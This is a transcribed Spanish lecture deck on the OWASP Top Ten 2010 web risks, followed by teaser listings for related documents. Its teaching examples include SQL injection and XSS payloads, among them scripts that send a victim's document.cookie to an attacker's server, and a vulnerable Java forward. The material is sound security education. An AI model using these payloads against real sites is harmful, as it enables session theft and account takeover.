Open Web Application Security Project (OWASP) Que es un ataque?
|
|
- Emilio Valdéz Alarcón
- hace 8 años
- Vistas:
Transcripción
1 Open Web Application Security Project (OWASP) Roberto Gómez Lámina 1. Que es un ataque? Acción o acciones que tienen por objetivo el que cualquier parte de un sistema de información automatizado, deje de funcionar de acuerdo con su propósito definido. Esto incluye cualquier acción que causa la destrucción, modificación o retraso del servicio no autorizado. Lámina 2. OWASP 1
2 Aclaración ataque No es un ataque físico (aunque puede ser). Un ataque no se realiza en un solo paso. Depende de los objetivos del atacante. Puede consistir de varios pasos antes de llegar a su objetivo. Lámina 3. Mecanismos de seguridad Firewalls IDS (Sistemas de Detección de Intrusos) Filtrado de información Lámina 4. OWASP 2
3 Sin embargo Empresas necesitan dar servicios al exterior. Existe un puerto que siempre esta abierto Lámina 5. OWASP Open Web Application Security Project Grupo de voluntarios Produce documentación, herramientas y estándares gratuitos Calidad profesional y de código abierto Página Lámina 6. OWASP 3
4 Qué es Seguridad de Aplicaciones Web? No es seguridad en redes Asegurar el código regularmente usado en una aplicación web, Asegurar librerías. Asegurar sistemas de backend. Asegurar aplicaciones y servidores web. Seguridad en redes ignora el contenido del tráfico HTTP. Firewalls, SSL, Intrusion Detection Systems, Operating System Hardening, Database Hardening Lámina 7. Seguridad en red vs seguridad en web Network Lay yer Application Layer APPLICATION ATTACK Firewall Your security perimeter has huge holes at the application layer Custom Developed Application Code App Server Web Server Hardened dos Firewall Databas ses Legacy Sys stems Web Serv vices Director ries Human Re esrcs Billing You can t use network layer protection (firewall, SSL, IDS, hardening) to stop or detect application layer attacks Lámina 8. OWASP 4
5 OWASP Top Ten Las 10 vulnerabilidades principales que están usando los atacantes contra páginas Web Similar al Top 20 de SANS / FBI pero para aplicaciones Web Un buen estándar mínimo para exigir a las áreas de desarrollo La mayoría de los problemas anteriores caen en alguna de estas categorías generales Lámina 9. Las dos primeras versiones Unvalidated Input 1. Cross Site Scripting (XSS) 2. Broken Access Control 2. Injection Flaws 3. Broken Authentication and 3. Malicious File Execution Session Management 4. Insecure Direct Object 4. Cross Site Scripting Reference 5. Buffer Overflow 5. Cross Site Request Forgery (CSRF) 6. Injection Flaws 7. Improper Error Handling 8. Insecure Storage 9. Application Denial of Service 10. Insecure Configuration Management 6. Information Leakage and Improper Error Handling 7. Broken Authentication and Session Management 8. Insecure Cryptographic Storage 9. Insecure Communications 10. Failure to Restrict URL Access Lámina 10. OWASP 5
6 La versión 2010 A1: Injection A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session Management A4: Insecure Direct Object References A5: Cross-Site Request Forgery (CSRF) A6: Security Misconfiguration A7: Insecure Cryptographic Storage A8: Failure to Restrict URL Access A9: Insufficient Transport Layer Protection A10: Unvalidated Redirects and Forwards Lámina 11. Qué cambio? Se trata de riesgos, no solo vulnerabilidades Nuevo título: The Top 10 Most Critical Web Application Security Risks Metodología Basada en OWASP Risk Rating Methodology. Dos riesgos añadidos, dos eliminados Se añadio A6-Mala Configuración Seguridad Era A10 en el 2004: : Insecure Configuration Management Se añadio ñdi A10: Direccionamientos i i inválidos Relativamente comun y muy peligrosa falla que no es muy conocida. Se eliminó A3- Malicious File Execution Más que nada una falla en PHP que esta en decadencia Se eliminó A6 - Information Leakage and Improper Error Handling Una falla existente, pero que normalmente no representa mucho riesgo. Lámina 12. OWASP 6
7 Mapeo 2007 a 2010 OWASP Top (Previous) A2 Injection Flaws A1 Cross Site Scripting (XSS) A1 Injection OWASP Top (New) A2 Cross Site Scripting (XSS) A7 Broken Authentication and Session Management A4 Insecure Direct Object Reference A5 Cross Site Request Forgery (CSRF) <was T A10 Insecure Configuration Management> A8 Insecure Cryptographic Storage = = + A3 Broken Authentication and Session Management A4 Insecure Direct Object References A5 Cross Site Request Forgery (CSRF) A6 Security Misconfiguration (NEW) A7 Insecure Cryptographic Storage A10 Failure to Restrict URL Access A8 Failure to Restrict URL Access A9 Insecure Communications <not in T > A9 Insufficient Transport Layer Protection A10 Unvalidated Redirects and Forwards (NEW) A3 Malicious File Execution <dropped from T > A6 Information Leakage and Improper Error Handling <dropped from T > = Lámina 13. Metodología OWASP Top 10 Threat Agent? Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Easy Widespreadd Easy Severe Average Common Average Moderate Difficult Uncommon Difficult Minor Business Impact? Injection Example 1.66 * weighted risk rating Lámina 14. OWASP 7
8 OWASP Top Ten (Edición 2010) Lámina Inyección Inyección implica Engañar a una aplicación incluyendo comandos en los datos enviados id a un interprete. Interpretes Toman los strings y los interpretan como comandos. SQL, Shell SO, LDAP, Xpath, Hibernate, etc. Inyección SQL aún es muy común. Muchas aplicaciones aún son susceptibles (no se sabe por qué). Aun cuando es usualmente simple de evitar. Impacto Usualmente severo. La base de datos entera puede ser leída o modificada. Posible contar con el esquema total de la base de datos, o contar con acceso a cuentas o a nivel S.O. Lámina 16. OWASP 8
9 s Desarrollo de Aplicaciones Distribuidas Ejemplo Inyección SQL ayer Application La HTTP request APPLICATION ATTACK Account Finance ts e ation ons Administra Transactio App Server ation Mgmt rce ions HTTP SQL response query Communica Knowledge M Custom Code Web Server E-Commer Bus. Functi Database tems Legacy Syst ces Web Servic es Directorie srcs Human Res DB Table Billing "SELECT * FROM Account Summary Account: accounts WHERE acct= Acct: SKU: OR = Acct: " Acct: Acct: Application presents a form to the attacker 2. Attacker sends an attack in the form data 3. Application forwards attack to the database in a SQL query Network Layer Firewall Hardened OS Firewall 4. Database runs query containing attack and sends encrypted results back to application 5. Application decrypts data as normal and sends results to the user Lámina Cross-Site Scripting (XSS) Ocurre en cualquier tiempo Datos en bruto es enviado por el atacante al browser de un usuario. Datos en bruto Almacenado en la base de datos Reflejado de la entrada web Enviado directamente a los scripts del cliente. Virtualmente cada aplicación web tiene este problema Intentar en el browser: javascript:alert(documento.cookie). Impacto típico Robar la sesión del usuario, robo de datos sensibles, rescribir la página web, redirigir usuario a un sitio de phishing o malware. Lámina 18. OWASP 9
10 Ataque XSS El problema reside en la administración de archivos adjuntos de tipo.html o.htm Manejar la salida de una aplicación web es lo mismo que pasar datos a los subsistemas el subsistema final al que se le pasa datos es el browser del visitante y el parser HTML en el browser solo es otro sistema cuando se envían datos a él se debe poner atención a los metacaracteres Problema notificado por CERT en el Lámina 19. Empecemos por lo sencillo Aplicación web: guest book permite visitantes introducir lo que dessen y solo añaden el nuevo texto a lo que estaba antes Usuario malicioso introduce lo siguiente: <!-- Nada pasa al principio, pero se mezcla con lo que se escribió y lo que se escribirá, aplicación web pasará lo siguiente a lectores libro de visitas: : Cool web page, dude! <!-- You re da man, boss : Lámina 20. OWASP 10
11 Otros dos ejemplos Posible introducir: <script> for (q=0; q < 1000; q++) window.open( </script> Otro ejemplo un sitio de discusión para niños el sitio carece de filtrado hacia afuera, y alguien introduce lo siguiente: <imag src = Lámina 21. Ejemplo XSS 1 2 Attacker sets the trap update my profile Attacker enters a malicious script into a web page that stores the data on the server Victim views page sees attacker profile Application with stored XSS vulnerability Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Custom Code Script runs inside victim s browser with full access to the DOM and cookies 3 Script silently sends attacker Victim s session cookie Lámina 22. OWASP 11
12 Algo de código JavaScript proporciona cookie al web server del atacante <script> document.location.replace( + =?what= + document.cookie) </script> Enviando el browser al sitio original <script> if (document.cookie.indexof( stolen ) < 0 { document.cookie = stolen=true ; document.location.replace( + =?what= + document.cookie + = &whatnext= ) } </script> Lámina 23. Otros ataques XSS Modificación texto posible cambiar información mientras la página es desplegada XSS con ingeniería social script malicioso no es almacenado en el servidor atacante engaña a la víctima, para que este se dirija a un URL con el scripto malicioso Robo de passwords algunos sitios vuelven a desplear el user-name si la autenticación falla, considerando que el password fue mal tecleado Lámina 24. OWASP 12
13 Ejemplo de ingeniería social Lámina 25. Esquemas a evitar en ambientes HTML #1: ( &, <, >, " ) &entity; ( ', / ) &#xhh; ESAPI: encodeforhtml() HTML Element Content (e.g., <div> some text to display </div> ) HTML Attribute Values (e.g., <input name='person' type='text' value='defaultvalue'> ) JavaScript Data (e.g., <script> some javascript </script> ) HTML Style Property Values (e.g.,.pdiv a:hover {color: red; text-decoration: underline} ) URI Attribute Values (e.g., <a href="javascript:toggle('lesson')" ) #2: All non-alphanumeric < 256 &#xhh ESAPI: encodeforhtmlattribute() #3: All non-alphanumeric < 256 \xhh ESAPI: encodeforjavascript() #4: All non-alphanumeric < 256 \HH ESAPI: encodeforcss() #5: All non-alphanumeric < 256 %HH ESAPI: encodeforurl() ALL other contexts CANNOT include Untrusted Data Recommendation: Only allow #1 and #2 and disallow all others See: for more details Lámina 26. OWASP 13
14 3. Autenticación rota y manejo de sesiones HTTP es un protocolo stateless Se deben presentar credenciales en cada petición Debe usar SSL para cualquier tipo de autenticación. Manejo de las fallas en la sesión SESSION ID usado para seguimiento del estado. SESSION ID es visible en la red, en browsers, logs, etc. Cuidado con los side-doors Cambiar contraseña, recordar contraseña, olvide mi contraseña, pregunta secreta, dirección correo, etc. Impacto Cuentas usuarios comprometidas o sesiones de usuarios secuestradas. Lámina 27. Ejemplo com?jsessionid=9fa1db9ea... 1 User sends credentials Site uses URL rewriting (i.e., put session in URL) 2 Accounts Finance Adm ministration Tr ransactions mmunication Knowledge Mgmt Commerce s. Functions Com K Custom Code E- Bus 3 User clicks on a link to hacker com in a forum 5 Hacker uses JSESSIONID and takes over victim s account Hacker checks referer logs on and finds user s JSESSIONID Lámina OWASP 14
15 4. Dirección insegura de referencias de objetos Cómo protege el acceso a sus datos? Es parte de reforzar Autorización, junto con el número 8: Restricción Acceso al URL Error común Solo listar los objetos autorizados para el usuario correcto o, Esconder los objetos referenciados en campos ocultaos.. Y entonces no aplicar estas restricciones en el lado del servidor. Esto se conoce como control de acceso a nivel presentación y no funciona. Atacante simple y sencillamente tampers con el valor del parámetro. Impacto Atacante puede acceder a datos o archivos no autorizados. Lámina 29. Ejemplo Attacker notices his acct parameter is 6065?acct=6065 He modifies it to a nearby number?acct=6066 Attacker views the victim s account information Lámina 30. OWASP 15
16 5. Cross Site Request Forgery (CSRF) CSRF Un ataque donde el browser de la víctima es engañado usando un comando hacia una aplicación web vulnerable. Vulnerabilidad provocada por que los browsers automáticamente incluyen datos de autenticación de los usuarios en cada petición. Imaginar Y si un usuario puede dirigir el ratón de un usurario y hacer click en ligas que se encuentran en una aplicación bancaria. Qué daño podrían provocar? Impacto Iniciar transacciones. Acceso a datos sensibles Cambiar datos cuentas. Lámina 31. Ejemplo 1 Attacker sets the trap on some website on the internet (or simply via an ) 2 Hidden <img> tag contains attack against vulnerable site While logged into vulnerable site, victim views attacker site Application with CSRF vulnerability Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Custom Code <img> tag loaded by browser sends GET request (including credentials) to vulnerable site Lámina Vulnerable site sees legitimate request from victim and performs the action requested OWASP 16
17 6. Mala configuración de seguridad Aplicaciones Web reposan sobre otro código. Todo desde el S.O. hasta el servidor Web No olvidar las librerías que se están usando. Es el código usado un secreto? Pensar en todos los lugares donde el código desarrollado se mueve. Seguridad no requiere código fuente secreto. CM se debe extender a todas las partes de la aplicación Todas las credenciales deben cambiar en producción. Impacto Instalar backdoor a través de parches no instalados del SO o servidor. Acceso no autorizado a cuentas por default. Lámina 33. Ejemplo ounts ance Acco Fina istration actions Admini Trans unication dge Mgmt mmerce unctions Commu Knowled E-Com Bus. Fu Database Custom Code App Configuration Insider Framework App Server Web Server Hardened OS Development QA Servers Test Servers Source Control Lámina 34. OWASP 17
18 7. Almacenamiento criptográfico inseguro Almacenando datos sensibles de forma insegura. Falla para identificar datos sensbibles. Falla para identificar todos los lugares donde estos datos son almacenados. Falla de proteger los datos en cada lugar. Impacto. Atacante accede o modifica información privada y/o confidencial. Atacante extrae secretos para usar en ataques posteriores. Mala reputación empresa, insatisfacción de los clientes, y la pérdida de confianza Gastos en la limpieza del incidente, tales como forencia, envío de cartas de disculpa, reponer tarjetas de crédito, proporcionar seguro contra robo de identidad. El negocio es demandado o terminado. Lámina 35. Ejemplo Victim enters credit 1 card number in form Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Custom Code 4 Malicious insider steals 4 million credit card numbers Log files Error handler logs CC details because merchant gateway is unavailable 2 Logs are accessible to all members of IT staff for debugging purposes 3 Lámina 36. OWASP 18
19 8. Falla en restringir el acceso al URL Cómo se protege el acceso al URL (páginas)? Esto es parte de reforzar la autenticación (punto 4). Error común Desplegar solo ligas autorizadas y opciones de menú. Esto se conoce como control de acceso a nivel presentación y no funciona. Atacante forza acceso directo a paginas no autorizadas. Impacto Atacante invoca funciones y servicios para los que no esta autorizado. Acceso a otras cuentas de usuarios y datos. Lleva a cabo acciones privilegiadas. Lámina 37. Ejemplo Attacker notices the URL indicates his role /user/getaccounts He modifies it to another directory (role) /admin/getaccounts, or /manager/getaccounts/ t Attacker views more accounts than just their own Lámina 38. OWASP 19
20 9. Insuficiente protección a nivel capa de transporte. Transmisión de datos de forma sensible. Falla en identificar los datos sensibles. Falla en identificar todos los lugares a los cuales los datos son enviados. Falla en proteger de forma apropiada estos datos en cada lugar. Impacto Atacante accede o modifica información privilegiada o privada. Tarjetas de crédito, registros hospitalarias, datos financieros (de la organización ió o de sus clientes) Atacante extrae secretos a usar en otros ataques. Mala reputación empresa, insatisfacción de los clientes, y la pérdida de confianza Gastos en la limpieza del incidente. El negocio es demandado o terminado Lámina 39. Ejemplo External Victim Custom Code Backend Systems Business Partners External attacker steals credentials and data off network External Attacker 1 2 Employees Internal attacker steals credentials and data from internal network Internal Attacker Lámina 40. OWASP 20
21 10. Redireccionamientos inválidos Redireccionamientos en una página web es algo común. Frecuentemente se incluyen parámetros proporcionados por el usuario en el URL destino. Si no son validados, el atacante puede enviar a la víctima al sitio de su preferencia. Forwards (aka Transfer en.net) también son comunes. Internamente envían la petición a una nueva página en la misma aplicación. Algunas veces los parámetros define la página. Si no son validados, el atacante puede ser capaz de usar forwards no validados para bypasear las verificaciones de autenticación y autorización. Impacto Redireccionar a la víctima a sitios de phishing o malware. Permite uso de funciones no autorizadas o acceso a datos. Lámina 41. Ejemplo Redirect 1 Attacker sends attack to victim via or webpage From: Internal Revenue Service Subject: Your Unclaimed dtax Refund Our records show you have an unclaimed federal tax refund. Please click here to initiate your claim. 3 Application redirects victim to attacker s site 2 Victim clicks link containing unvalidated parameter Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Custom stomcode Request sent to vulnerable site, including attacker s destination site as parameter. Redirect sends victim to attacker site Evil Site & &dest= Lámina Evil site installs malware on victim, or phish s for private information OWASP 21
22 Ejemplo Forward 1 Attacker sends attack to vulnerable page they have access to Request sent to vulnerable page which user does have access to. Redirect sends user directly to private page, bypassing access control. public void sensitivemethod( HttpServletRequest request, HttpServletResponse response) { try { // Do sensitive stuff here.... } catch (... 2 Application authorizes request, which continues Filter to vulnerable page 3 Forwarding gpage fails to validate parameter, sending attacker to unauthorized page, bypassing access control public void dopost( HttpServletRequest request, HttpServletResponse response) { try { String target = request.getparameter( "dest" ) );... request.getrequestdispatcher( target ).forward(request, response); } catch (... Lámina 43. Y que hacemos? Desarrollar código seguro Seguir las mejores prácticas de la guía del OWASP: Guide to Building Secure Web Applications Usar el estándar de verificación de seguridad en aplicaciones del OWASP, como una guía para saber que necesita una aplicación para ser segura. Usar componentes de seguridad que se acoplen a la organización. Utilizar OWASP s ESAPI como la base de los componentes estándares. /i h /ESAPI Revisar sus aplicaciones Que un equipo experto revise sus aplicaciones. Revise sus aplicaciones internamente siguiendo las guías OWASP OWASP Code Review Guide: OWASP Testing Guide: Lámina 44. OWASP 22
23 OWASP (ESAPI) Referencia: Lámina 45. Conclusiones No basta con una defensa perimetral Es importante saber que esta viendo la gente de afuera Nuestros desarrolladores todo es para ayer solo se preocupan porque funcione Un buen par de guías/referencias Writing Secure Code, Second Edition, Michael Howard, David LeBlanc Building Secure Software: How to Avoid Security Problems the Right Way -- by John Viega, Gary McGraw; OWASP Open Web Application Security Project Lámina 46. OWASP 23
24 Open Web Application Security Project (OWASP) Roberto Gómez Lámina 47. OWASP 24
OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web. The OWASP Foundation. Felipe Zipitría
OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web Felipe Zipitría OWASP/ GSI- Facultad de Ingeniería felipe.zipitria@owasp.org Copyright The OWASP Foundation Permission is granted
Más detallesThe OWASP Foundation http://www.owasp.org
Los 10 riesgos más críticos que deben afrontar las organizaciones sobre sus aplicaciones: Top 10 Cádiz, 24 febrero 2011 Vicente Aguilera Díaz Spain Chapter Leader vicente.aguilera@owasp.org Copyright The
Más detallesHacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet
Hacking Ético Web I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com @ciyinet Índice Introducción OWASP OWASP Top 10 (2010) Demostración ataques Inyección SQL
Más detallesIngeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US
Sobre mi Formación Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Experiencia Aficiones 4+ años como desarrollador web, más de 2 en Drupal
Más detallesSeguridad en Home Banking. Tendencias de la Tecnología en Seguridad Informática Argentina 2010
Seguridad en Home Banking Tendencias de la Tecnología en Seguridad Informática Argentina 2010 1 Agenda 1. Proyecto Home Banking 2. Confección de equipos de trabajo 3. Arquitectura integral de seguridad
Más detallesVÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso
VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL AUTOR: Chema Alonso Consultor de Seguridad en Informática 64. Microsoft MVP Enterprise Security
Más detallesAtaques XSS en Aplicaciones Web
Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted
Más detallesOffensive State Auditoría de Aplicaciones Web
Offensive State Auditoría de Aplicaciones Web Tabla de contenidos Servicio de auditoría en aplicaciones web...3 Por qué?...3 Metodologías...4 Etapas y pruebas a realizar...4 1. Fingerprint del objetivo...4
Más detallesCapítulo 2.- Vulnerabilidades en aplicaciones web.
Capítulo 2.- Vulnerabilidades en aplicaciones web. En este capítulo se explican algunas vulnerabilidades en aplicaciones web que pueden ser explotadas por software o por personas malintencionadas y como
Más detallesSECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP
SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a las Aplicaciones Web
Más detallesDesarrollo seguro en Drupal. Ezequiel Vázquez De la calle
Sobre mi Estudios Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Experto en Seguridad de las TIC - US Experiencia Aficiones 3+ años como desarrollador web, casi 2 en Drupal
Más detallesSeguridad en Sistemas Informáticos (SSI) Programación Segura
1 Seguridad en Sistemas Informáticos (SSI) Programación Segura Carlos Pérez Conde Departament d'informàtica Escola Técnica Superior d'enginyeria Universitat de València 2 Bibliografía específica OWASP
Más detallesSeguridad en Sitios Web de Alto Tráfico. Ing. Enrique Hurtarte Juárez
Seguridad en Sitios Web de Alto Tráfico Ing. Enrique Hurtarte Juárez Guatemala, 24 de Julio de 2014 XumaK Quienes somos XumaK es una empresa que fue fundada en 2003 por Marcos Andres como una de las primeras
Más detallesSeguridad en Aplicaciones Web
Seguridad en Aplicaciones Web Juan Isaias Calderón CISSP, GCFA, ECSA, CEH, MCP jcalderon@trustwave.com SpiderLabs Lámina 1 Dr. Roberto Gómez C. Inseguridad de las aplicaciones Web De 300 sites auditados
Más detallesWeb: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen
Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y defensa Introducción. Cross Site Scripting (XSS). SQL Injection. Programador? quien yo?. Ataques NG. Prevención.
Más detallesSeguridad en Aplicaciones Web
Seguridad en Aplicaciones Web Fabian Portantier Consultor en Seguridad Informática Instructor y Escritor sobre el tema Coordinador de la Carrera de Seguridad www.portantier.com Aplicaciones Web Actuales
Más detallesOWASP Top 10 2010 Los diez riesgos más importantes en aplicaciones web. The OWASP Foundation http://www.owasp.org/
OWASP Top 10 2010 Los diez riesgos más importantes en aplicaciones web Fabio Cerullo Comité Global de Educación OWASP fcerullo@owasp.org Copyright The OWASP Foundation Permission is granted to copy, distribute
Más detallesProgramación de código seguro
Programación de código seguro Distinción de vulnerabilidades Stack OverFlow y Heap OverFlow Comunes en lenguajes y aplicaciones de escritorio TOP 10 OWASP Muchas otras Stack OverFlow Stack OverFlow: Ejemplo
Más detallesTesting de Seguridad de Aplicaciones Web
Testing de Seguridad de Aplicaciones Web Julio C. Ardita, CISM. jardita@cybsec.com 16 de Noviembre de 2013 Coatzacoalcos - MEXICO Temario - Protocolo HTTP - Herramientas de Testing Web. - Vulnerabilidades
Más detallesWeb : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team
Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Temario 1. Introducción 2. Cross Site Scripting (XSS) 3. Inyección SQL 4. Nuestro código en el servidor 5.
Más detallesOWASP Top : Riesgos de seguridad en las Aplicaciones Web
c. Santander, 101. Edif. A. 2º I E-08030 Barcelona (Spain) I Tel.: +34 93 305 13 18 I Fax: +34 93 278 22 48 Pº. de la Castellana, 164-166. Entlo. 1ª I E-28046 Madrid (Spain) I Tel: +34 91 788 57 78 I Fax:
Más detallesCurso: (30227) Seguridad Informática
Curso: (30227) Seguridad Informática Fernando Tricas García Departamento de Informática e Ingeniería de Sistemas Universidad de Zaragoza http://webdiis.unizar.es/~ftricas/ http://moodle.unizar.es/ ftricas@unizar.es
Más detallesWAPITI. Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad. VI OWASP Spain Chapter Meeting
ARGENTINA COLOMBIA CHILE ESPAÑA EE.UU. MÉXICO PANAMÁ VENEZUELA David del Pozo González dpozog@grupogesfor.com WAPITI Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad Junio 2010 www.gesfor.es
Más detallesARE YOUR WEB VULNERABLE?
CROSS-SITE SITE SCRIPTING: ARE YOUR WEB APPLICATIONS VULNERABLE? Alberto Calle Alonso Sebastián Marcos Miguel Mateo de la Puente Madrid, Febrero 2009 1 ÍNDICE Introducción Cross-site scripting HTTP y HTML
Más detallesSesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez 2015-1
Sesión 13. Seguridad en la web Luisa Fernanda Rincón Pérez 2015-1 Qué vimos la clase pasada? 1. Características de MongoDB 2. Colecciones - documentos 3. Consulta, inserción, modificación, eliminación
Más detallesDOCS. Pautas básicas para el DESARROLLO DE PLUGINS
Pautas básicas para el DESARROLLO DE PLUGINS ÍNDICE 1. Protección contra CSRF............................. 2. Protección XSS.................................... 3. Protección contra inyecciones SQL6...................
Más detallesMáster Profesional en Tecnologías de Seguridad. Seguridad en la web
Máster Profesional en Tecnologías de Seguridad Módulo VI - Programación Segura Seguridad en la web @josereyero http://www.reyero.net consulting@reyero.net Seguridad en la Web Introducción y objetivos Programa
Más detallesAUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS
AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS Las auditorias técnicas según el Reglamento 211/2011 de la Unión Europea y según el Reglamento de
Más detalleshttp://miel.unlam.edu.ar/interno/mensajes/mensajeria.asp?idcomision=&idpersona=38527273
Reporte de vulnerabilidades Materias Interactivas en Línea Nicolás Satragno Abstract El presente es un reporte de las vulnerabilidades encontradas en el sistema Materias Interactivas en Línea (MIeL) de
Más detallesTecnologías Aplicadas al Dominio "Desarrollo, Adquisición y Mantenimiento de los Sistemas de Información"
Tecnologías Aplicadas al Dominio "Desarrollo, Adquisición y Mantenimiento de los Sistemas de Información" No nos va a pasar nosotros Riesgo en Aplicaciones y Sistemas de Información Malas prácticas de
Más detallesCONCLUSIONES 155 A través de cada uno de los capítulos del presente documento se han enumerado una serie herramientas de seguridad que forman parte del sistema de defensa de una red y que, controlan su
Más detallesCapítulo 4 Pruebas e implementación de la aplicación CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN
CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN CONCEPTOS DE PRUEBAS DE APLICACIÓN El departamento de Testing se encarga de diseñar, planear y aplicar el rol de pruebas a los sistemas que el PROVEEDOR
Más detallesINTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS
INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS Marco A. Lozano Merino Mayo 2012 Índice 1.Seguridad a nivel de usuario 1.Amenazas y protección 2.La realidad de la seguridad: hackers 3.Seguridad en redes
Más detallesOWASP: Un punto de vista. aplicaciones web seguras
OWASP: Un punto de vista pragmático para el desarrollo de aplicaciones web seguras Armando Carvajal (armando.carvajal@globalteksecurity.com) Gerente Arquitecto Soluciones Globaltek Security Master en seguridad
Más detallesSeguridad en el desarrollo
OWASP Latam Tour Venezuela 2013 Seguridad en el desarrollo Mateo Martínez, CISSP mateo.martinez@owasp.org OWASP Uruguay Comité Global de Industrias de OWASP Agenda Agenda Introducción Seguridad en el ciclo
Más detallesGuía de doble autenticación
Guía de doble autenticación Índice Guía doble autenticación 1. Introducción a la Doble Autenticación: Qué es? 4 Ataques a las contraseñas 6 Fuerza bruta 6 Malware 6 Phishing 6 Ataques a servidores 6 2.
Más detallesLBSEC. http://www.liveboxcloud.com
2014 LBSEC http://www.liveboxcloud.com LiveBox Srl no asume responsabilidades o garantías sobre el contenido y uso de ésta documentación y declina cualquier garantía explicita o implícita de comercialidad
Más detallesXPERTO EN DISEÑO DE PÁGINAS WEB
Curso ICA de: EXPERTO EN DISEÑO DE PÁGINAS WEB Módulo 1: Program. cliente: JavaScript Estudia el lenguaje JavaScript para crear guiones o scripts que se incluyen en las páginas web y que son ejecutados
Más detallesCircular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web
ASIT 20070501 CT Pautas de seguridad para aplicaciones web v1 2007-05-16 Documento de Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web Versión 01 ARCHIVO: ASIT 20070501
Más detallesSeguridad en Aplicaciones Web
Seguridad en Aplicaciones Web Leandro Meiners lmeiners@cybsec cybsec.comcom Septiembre de 2005 Buenos Aires - ARGENTINA Temario Temario Introducción al Protocolo HTTP: Arquitectura, carácterísticas, autenticación,
Más detallesLOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES. www.owasp.org
LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES www.owasp.org Quien soy? Ing. Elvin Vidal Mollinedo Mencia Profesional de seguridad + 9 años de experiencia en desarrollo
Más detalles100% Laboratorios en Vivo
100% Laboratorios en Vivo Sabemos que la única forma de aprender es haciendo. Por lo mismo todos los laboratorios son con desafíos de hacking en un ambiente en vivo. Con servidores y servicios dentro de
Más detallesIn-seguridad y malware en dispositivos móviles
In-seguridad y malware en dispositivos móviles Damián Muraña damian @ murana.uy @damianmurana damianmurana@joindiaspora.com www.murana.uy Para qué usamos los móviles? 03/2013 Com. por internet E-Mail Noticias
Más detallesS E G U R I D A D E N A P L I C A C I O N E S W E B
H E R R A M I E N T A S A V A N Z A DA S D E DE S A R R O L L O D E S O F T W A R E 2 0 0 7-2 0 0 8 S E G U R I D A D E N A P L I C A C I O N E S W E B X S S Y S Q L I N J E C T I O N G R U P O 2 4 S A
Más detallesb1010 formas de escribir código (in)seguro
b1010 formas de escribir código (in)seguro 1 Lic. Cristian Borghello, CISSP - MVP www.segu-info.com.ar @seguinfo Temario Redes externas vs internas Bugs simples Validación de archivos XSS y SQL Injection
Más detallesChristian Martorella - Vicente Díaz Edge-security Fist Conference April 2007
Christian Martorella - Vicente Díaz Edge-security Fist Conference April 2007 Indice Introducción a la seguridad de DB Motores de Bases de Datos Ataques internos Ataques externos Conclusiones Introducción
Más detallesPentesting con OWASP Zed Attack Proxy
Pentesting con OWASP Zed Attack Proxy 1. Introducción ZAP es una poderosa herramienta para realizar ataques de penetración (disciplina conocida como Pentesting), que permite analizar sitios web para buscar
Más detallesDocumentación PopGrabber
Documentación PopGrabber En esta documentación se detallará el funcionamiento y configuración del programa PopGrabber. 1. Funcionamiento: Eclarsys PopGrabber es un programa que recupera e mails desde cuentas
Más detallesSession Hijacking: Secuestro de sesiones en aplicaciones web empresariales
Session Hijacking: en aplicaciones web empresariales OWASP LATAM TOUR 2012 OMAR PALOMINO HUAMANÍ KUNAK CONSULTING SAC omarc320@gmail.com opalomino@kunak.com.pe Telef: 973861650 http://www.el-palomo.com
Más detallesImpacto del ENS: Propuesta Oracle
